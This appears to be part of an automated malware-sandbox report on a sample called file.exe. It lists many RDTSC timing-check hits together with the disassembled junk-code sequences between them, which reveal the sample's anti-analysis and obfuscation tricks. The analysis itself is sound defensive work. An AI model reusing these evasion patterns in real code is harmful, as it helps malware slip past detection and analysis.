            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CEB second address: 3F4CF5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E7D257EC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CF5 second address: 3F4CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4CFB second address: 3F4D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2E7D257ED6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4D0B second address: 3F4D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F4D1D second address: 3F4D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EFCE0 second address: 3EFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4320A3 second address: 4320AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F2E7D257EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4321F6 second address: 432209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F2E7D1D3436h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432209 second address: 432221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D257EBFh 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43237E second address: 432382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 432382 second address: 4323A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC3h 0x00000007 jmp 00007F2E7D257EBDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43497C second address: 434980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434C8C second address: 434C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434D5E second address: 434D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E14 second address: 434E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434E18 second address: 434E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434EB9 second address: 434ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435070 second address: 435074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4354B5 second address: 4354BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435550 second address: 435554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4357A2 second address: 4357A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43592C second address: 43594F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E7D1D343Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F2E7D1D343Ch 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43594F second address: 435959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2E7D257EB6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435A11 second address: 435A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E7D1D3436h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435AA2 second address: 435AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FA1 second address: 435FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F2E7D1D3438h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FC2 second address: 435FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435FC8 second address: 435FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4368F6 second address: 436901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E7D257EB6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 436901 second address: 436959 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E7D1D3438h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F2E7D1D3438h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dword ptr [ebp+12461F35h], ecx 0x0000002b mov dword ptr [ebp+1245A754h], edx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D283Ah], eax 0x00000039 push 00000000h 0x0000003b jmp 00007F2E7D1D3440h 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43841B second address: 438425 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E7D257EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 438126 second address: 438151 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E7D1D344Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jng 00007F2E7D1D3436h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DB1 second address: 439DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DB5 second address: 439DBB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DBB second address: 439DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 439DCD second address: 439DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6844 second address: 3F685A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2E7D257EBDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A386 second address: 43A38C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A38C second address: 43A3ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jnc 00007F2E7D257ECAh 0x00000011 pop ebx 0x00000012 nop 0x00000013 and di, 9631h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F2E7D257EB8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov edi, edx 0x00000036 push 00000000h 0x00000038 cmc 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43A3ED second address: 43A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AE41 second address: 43AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007F2E7D257EB8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F2E7D257EB6h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B6BA second address: 43B6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2E7D1D343Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B6D3 second address: 43B6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBCh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43C3D0 second address: 43C3D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43E029 second address: 43E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43FAFB second address: 43FB00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43FB00 second address: 43FB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2E7D257EB6h 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F2E7D257EB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440C0E second address: 440C8C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2E7D1D343Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F2E7D1D3438h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add di, 4115h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F2E7D1D3438h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D30F2h], ecx 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jnp 00007F2E7D1D344Fh 0x00000059 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441B50 second address: 441B6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E7D257EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E7D257EBAh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440D8A second address: 440E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2E7D1D3445h 0x0000000a popad 0x0000000b nop 0x0000000c add dword ptr [ebp+122D33A3h], edi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 sub ebx, 77358400h 0x0000001f jl 00007F2E7D1D3436h 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F2E7D1D3438h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 or dword ptr [ebp+122D2B0Eh], edx 0x0000004c mov eax, dword ptr [ebp+122D15BDh] 0x00000052 cld 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007F2E7D1D3438h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f mov edi, dword ptr [ebp+122D38B2h] 0x00000075 call 00007F2E7D1D343Dh 0x0000007a pop ebx 0x0000007b nop 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 popad 0x00000081 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 440E2F second address: 440E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B80 second address: 442B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B87 second address: 442B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B8D second address: 442B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CAA second address: 441CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442B91 second address: 442BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F2E7D1D3438h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov bh, 3Dh 0x00000025 push 00000000h 0x00000027 jmp 00007F2E7D1D343Ah 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f jmp 00007F2E7D1D343Dh 0x00000034 pop ebx 0x00000035 xchg eax, esi 0x00000036 push ebx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CB0 second address: 441CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2E7D257EC7h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 js 00007F2E7D257EB6h 0x00000019 pop edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442BE1 second address: 442BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 441CDC second address: 441CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EBFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B40 second address: 444B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B46 second address: 444B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444B4A second address: 444BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F2E7D1D3438h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jne 00007F2E7D1D3436h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F2E7D1D3438h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443C1B second address: 443C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F2E7D257EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED23 second address: 47ED27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED27 second address: 47ED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED2D second address: 47ED33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED33 second address: 47ED7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2E7D1D3445h 0x0000000c jmp 00007F2E7D1D3442h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2E7D1D3440h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED7C second address: 47ED87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED87 second address: 47ED92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2E7D1D3436h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED92 second address: 47ED99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEDE second address: 47EEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEE2 second address: 47EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEEC second address: 47EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEF0 second address: 47EEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEF4 second address: 47EF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2E7D1D3447h 0x00000012 jmp 00007F2E7D1D343Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E43A second address: 47E449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EBBh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E449 second address: 47E44F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E44F second address: 47E459 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E7D257EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E459 second address: 47E463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F2DA second address: 47F2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F2E0 second address: 47F2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2E7D1D3446h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482519 second address: 48251D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484ED6 second address: 484EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484EF1 second address: 484F10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485098 second address: 4850A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850A0 second address: 4850C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E7D257EC8h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850C6 second address: 4850D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850D2 second address: 4850D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853D6 second address: 4853DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
